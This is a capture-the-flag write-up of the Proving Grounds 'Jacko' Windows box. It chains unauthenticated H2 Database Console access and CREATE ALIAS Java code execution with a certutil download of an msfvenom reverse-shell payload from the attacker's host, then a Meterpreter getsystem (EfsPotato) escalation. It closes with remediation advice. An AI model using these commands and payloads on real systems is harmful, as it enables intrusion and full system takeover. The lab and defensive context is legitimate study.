Box Overview

Jacko is a Windows machine from Offensive Security’s Proving Grounds demonstrating H2 Database exploitation for remote code execution and privilege escalation via SeImpersonate token abuse.

Difficulty: Intermediate (though arguably easier)

Enumeration

Nmap Scan

sudo nmap -sS -sC -A [TARGET_IP] -T4 -oN first.scan -p-

Key ports identified:

  • Port 8082 - H2 Database Console (web interface)
  • Port 22 - SSH
  • Additional Windows services

H2 Database Console - Port 8082

Accessing http://[TARGET_IP]:8082 reveals the H2 Database Console - a web-based SQL interface.

Key observation: The “Connect” button allows unauthenticated access to execute SQL queries!

Exploitation Research

Vulnerability Discovery

searchsploit h2 database

Found: H2 Database 1.4.199 - JNI Code Execution

searchsploit -m java/local/49384.txt

Vulnerability: H2 Database allows arbitrary Java code execution through JNI (Java Native Interface) via SQL queries.

Exploit Analysis

The exploit leverages H2’s ability to create custom functions and execute Java code:

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('java.lang.Runtime.getRuntime().exec("command")');

This allows arbitrary command execution on the underlying Windows system!

Initial Access

Payload Strategy

Two-stage approach:

  1. Download reverse shell executable using certutil
  2. Execute the downloaded payload

Stage 1 - Download Payload

Generate reverse shell:

msfvenom -p windows/meterpreter/reverse_tcp \
  LHOST=192.168.45.222 LPORT=9001 \
  -f exe -o shell_jacko.exe

Host payload:

python3 -m http.server 80

SQL Injection to download:

CREATE ALIAS IF NOT EXISTS JNIScriptEngine_eval FOR "JNIScriptEngine.eval";
CALL JNIScriptEngine_eval('new java.util.Scanner(java.lang.Runtime.getRuntime().exec("certutil -urlcache -split -f http://192.168.45.222:80/shell_jacko.exe C:\\Users\\tony\\Desktop\\shell_jacko.exe").getInputStream()).useDelimiter("\\Z").next()');

Explanation:

  • certutil -urlcache -split -f - Windows utility to download files
  • Downloads payload to C:\Users\tony\Desktop\
  • Wrapped in Java Scanner to capture output

Stage 2 - Execute Payload

Setup Metasploit listener:

sudo msfconsole -q

msf6 > use multi/handler
msf6 exploit(multi/handler) > set payload windows/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > set LHOST 192.168.45.222
msf6 exploit(multi/handler) > set LPORT 9001
msf6 exploit(multi/handler) > run

Trigger execution via SQL:

CALL JNIScriptEngine_eval('java.lang.Runtime.getRuntime().exec("C:\\Users\\tony\\Desktop\\shell_jacko.exe")');

Meterpreter session established!

[*] Sending stage (176198 bytes) to 192.168.241.66
[*] Meterpreter session 1 opened (192.168.45.222:9001 -> 192.168.241.66:50470)

User Flag

meterpreter > shell
C:\Users\tony\Desktop> whoami
jacko\tony

C:\Users\tony\Desktop> type local.txt
11f7879da5b172a5ff63e07e94556b95

User flag captured!

Privilege Escalation

Token Privilege Enumeration

meterpreter > getuid
Server username: JACKO\tony

meterpreter > getprivs

Key finding: User has SeImpersonatePrivilege enabled! 🎯

SeImpersonate Exploitation

Vulnerability: SeImpersonate token privilege allows impersonation of system-level tokens.

Metasploit automation:

meterpreter > getsystem

Metasploit automatically attempts multiple privilege escalation techniques:

Successful technique: Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)

...got system via technique 6 (Named Pipe Impersonation (EFSRPC variant - AKA EfsPotato)).

System access obtained! 🎯

Root Flag

meterpreter > shell

C:\Users\tony\Desktop> whoami
nt authority\system

C:\Users\tony\Desktop> cd C:\Users\Administrator\Desktop

C:\Users\Administrator\Desktop> type proof.txt
ccf816fd96596706c79367a7ab205502

Root flag captured!

Attack Chain Summary

  1. Service Discovery → H2 Database Console on port 8082
  2. Unauthenticated Access → Connected to database without credentials
  3. RCE Research → Found JNI code execution exploit
  4. Payload Download → Used certutil via SQL injection
  5. Meterpreter Shell → Caught reverse connection as user tony
  6. Privilege Check → Identified SeImpersonatePrivilege
  7. Automatic Escalation → Metasploit’s getsystem via EfsPotato
  8. System Access → Full domain/system compromise

Vulnerability Analysis

H2 Database JNI Code Execution

CVE: Not officially assigned (considered a feature abuse)

Affected Versions: H2 Database ≤ 1.4.199

Root Cause:

H2 Database allows creation of custom SQL functions using Java:

CREATE ALIAS function_name FOR "fully.qualified.ClassName.methodName";

Combined with JNI, this allows arbitrary code execution:

CREATE ALIAS SHELLEXEC AS $$ 
String shellexec(String cmd) throws java.io.IOException {
    java.util.Scanner s = new java.util.Scanner(
        Runtime.getRuntime().exec(cmd).getInputStream()
    ).useDelimiter("\\A");
    return s.hasNext() ? s.next() : "";
}
$$;
CALL SHELLEXEC('whoami');

Why This Works:

  1. H2 runs with privileges of the Java process
  2. No authentication required on default installation
  3. Network accessible (0.0.0.0:8082 by default)
  4. Full Java Runtime available

SeImpersonatePrivilege Abuse

Token Privileges:

Windows services run with special privileges. SeImpersonatePrivilege allows a process to impersonate security tokens of other processes.

Exploitation Methods:

1. EfsPotato (Used Here)

  • Abuses the Encrypting File System Remote Protocol (EFSRPC)
  • Triggers SYSTEM-level authentication
  • Captures and impersonates SYSTEM token
  • No DLL drop required

2. Alternative Techniques

  • JuicyPotato - COM/DCOM abuse
  • RoguePotato - OXID resolver abuse
  • PrintSpoofer - Print Spooler service abuse
  • GodPotato - Latest technique (2022+)

Why It Works:

Services with SeImpersonate can:

  1. Listen on a named pipe
  2. Trigger SYSTEM-level connection (via EFSRPC, DCOM, etc.)
  3. Impersonate the connecting SYSTEM token
  4. Execute commands as SYSTEM

Difficulty Assessment

Rated: Intermediate
Actual Difficulty: Easy-Intermediate

Why it’s easier than rated:

  1. Unauthenticated RCE - No password cracking required
  2. Public Exploit - Searchsploit has ready-made payload
  3. Automatic Privesc - Metasploit’s getsystem does everything
  4. No AV Bypass - Meterpreter worked without evasion

What makes it “Intermediate”:

  1. Requires understanding of Java/JNI concepts
  2. Two-stage payload delivery
  3. SQL injection syntax knowledge
  4. Token privilege understanding (educational value)

Remediation

H2 Database Security

1. Authentication

# h2.properties
webAllowOthers=false
webSSL=true
tcpAllowOthers=false

2. Network Restrictions

# Bind to localhost only
java -cp h2.jar org.h2.tools.Server \
  -web -webPort 8082 -webAllowOthers false

3. Disable Remote Access

-- Remove ALIAS creation permissions
REVOKE CREATE ALIAS FROM PUBLIC;

4. Update H2

  • Use H2 2.x versions with security improvements
  • Implement proper authentication
  • Run with minimal Java permissions

SeImpersonate Mitigation

1. Principle of Least Privilege

# Remove unnecessary privileges
# Use managed service accounts
New-ADServiceAccount -Name WebAppSvc -PrincipalsAllowedToRetrieveManagedPassword WebServers$

2. Windows Defender Application Guard

  • Isolate sensitive services
  • Use containers when possible
  • Implement AppLocker policies

3. Monitoring

# Enable audit of privilege use
auditpol /set /subcategory:"Sensitive Privilege Use" /success:enable /failure:enable

4. Patch Management

  • Keep Windows updated (EfsPotato patched in newer builds)
  • Apply security updates regularly
  • Test patches in non-prod first

Tools Used

  • nmap
  • searchsploit
  • msfvenom
  • Metasploit Framework
  • Python HTTP server
  • certutil (on target)

Techniques

  • Service enumeration
  • Public exploit research
  • SQL injection for RCE
  • Two-stage payload delivery
  • Meterpreter shells
  • Token privilege abuse
  • Named pipe impersonation (EfsPotato)

Key Takeaways

For Red Team

  1. Check for default configurations - H2 often runs unauthenticated
  2. Use Metasploit when appropriate - Automation saves time
  3. SeImpersonate = Easy Win - Check token privileges early
  4. Certutil is gold - Built-in Windows download utility

For Blue Team

  1. Never expose databases publicly - Even “development” instances
  2. Default configs kill - Always harden before deployment
  3. Monitor SeImpersonate usage - Rare for legitimate use cases
  4. Named pipe monitoring - Detect impersonation attacks

Educational Value

This box excellently demonstrates:

  • Database security misconfigurations
  • Java/JNI code execution concepts
  • Windows token privilege system
  • Multiple privilege escalation techniques
  • Real-world attack chains

Credits

Box Creator: Offensive Security
Platform: Proving Grounds Practice
Difficulty Rating: Intermediate

“Progress is being made!” - Sometimes the rated difficulty is just… wrong.